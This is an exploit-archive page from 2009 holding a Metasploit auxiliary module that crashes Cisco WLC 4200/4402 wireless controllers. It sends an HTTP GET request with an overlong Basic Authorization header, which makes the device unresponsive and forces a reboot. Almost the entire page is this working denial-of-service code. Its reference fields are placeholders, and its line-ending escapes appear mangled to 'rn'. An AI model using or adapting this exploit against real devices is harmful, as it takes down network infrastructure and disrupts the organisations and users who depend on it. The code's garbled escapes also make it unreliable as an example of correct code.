[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)
# Published : 2009-07-27
# Author : Christoph Bott
# Previous Title : ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC
# Next Title : MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow PoC
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0rn" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "rn")
disconnect
end
end
# www.Syue.com [2009-07-27]